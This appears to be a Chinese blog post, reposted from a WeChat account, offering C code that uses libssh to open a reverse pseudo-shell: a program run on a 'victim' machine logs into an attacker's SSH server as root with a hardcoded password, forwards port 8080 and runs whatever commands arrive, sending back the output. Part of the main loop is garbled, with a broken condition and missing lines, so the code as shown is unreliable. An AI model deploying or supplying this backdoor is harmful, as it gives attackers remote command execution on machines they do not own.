通过SSH反向SHELL

在探索libssh之后，我想做一些有用的事情，所以我的想法是有一种通过SSH进行反向shell。

• 客户端通过端口转发连接到攻击者的ssh服务器

• 攻击者机器端口8080将通过ssh隧道在本地主机上打开

• 现在攻击者可以用netcat连接到8080端口，现在有一个伪shell，可以执行命令

• 不幸的是我只有一个关于如何制作一个交互式shell的小小的线索，目前还不能正常工作

Code:

#include <libssh/libssh.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <errno.h>  int pseudo_shell(ssh_session session) {   int rc;   ssh_channel channel;   char buffer_ssh_in[256];   int nbytes, nwritten;   int port = 0;   int port2=1337;   rc = ssh_channel_listen_forward(session, NULL, 8080, &port2);   if (rc != SSH_OK)   {     fprintf(stderr, "Error opening remote port: %sn",             ssh_get_error(session));     return rc;   }   channel = ssh_channel_accept_forward(session, 60000, &port);   if (channel == NULL)   {     fprintf(stderr, "Error waiting for incoming connection: %sn",             ssh_get_error(session));     return SSH_ERROR;   }   while (1)   {     //user input     nbytes = ssh_channel_read(channel, buffer_ssh_in, sizeof(buffer_ssh_in), 0);     if (nbytes = comalloc) {             comalloc *= 2;             comout = (char *)realloc(comout, comalloc);         }         memmove(comout + comlen, buffer, chread);         comlen += chread;     }      //write output     nbytes = strlen(comout);     nwritten = ssh_channel_write(channel, comout, nbytes);     if (nwritten != nbytes)     {       fprintf(stderr, "Error sending answer: %sn",               ssh_get_error(session));       ssh_channel_send_eof(channel);       ssh_channel_free(channel);       return SSH_ERROR;     }     printf("Sent answern");   }   ssh_channel_send_eof(channel);   ssh_channel_free(channel);   return SSH_OK; }  int main() {   ssh_session my_ssh_session;   int rc;   char *password;   // Open session and set options   my_ssh_session = ssh_new();   if (my_ssh_session == NULL)     exit(-1);   ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "192.168.116.215");   ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, "root");   // Connect to server   rc = ssh_connect(my_ssh_session);   if (rc != SSH_OK)   {     fprintf(stderr, "Error connecting to localhost: %sn",             ssh_get_error(my_ssh_session));     ssh_free(my_ssh_session);     exit(-1);   }    // Authenticate ourselves   // Give password here   password = "password";   rc = ssh_userauth_password(my_ssh_session, NULL, password);   if (rc != SSH_AUTH_SUCCESS)   {     fprintf(stderr, "Error authenticating with password: %sn",             ssh_get_error(my_ssh_session));     ssh_disconnect(my_ssh_session);     ssh_free(my_ssh_session);     exit(-1);   }     pseudo_shell(my_ssh_session);   ssh_disconnect(my_ssh_session);   ssh_free(my_ssh_session); }

可以通过GitHub地址获取：https://github.com/govolution/stuff/blob/master/ssh_reverse_pseudo_shell.cpp

在“受害者”机器上编译并执行之后：

现在你已经拥有shell了

你如果想知道更多可以访问：

http://api.libssh.org/master/libssh_tutor_forwarding.html

https://rosettacode.org/wiki/Get_system_command_output

以上小姐姐所述
我司一概不负责

本文始发于微信公众号（逢人斗智斗勇）：通过SSH反向SHELL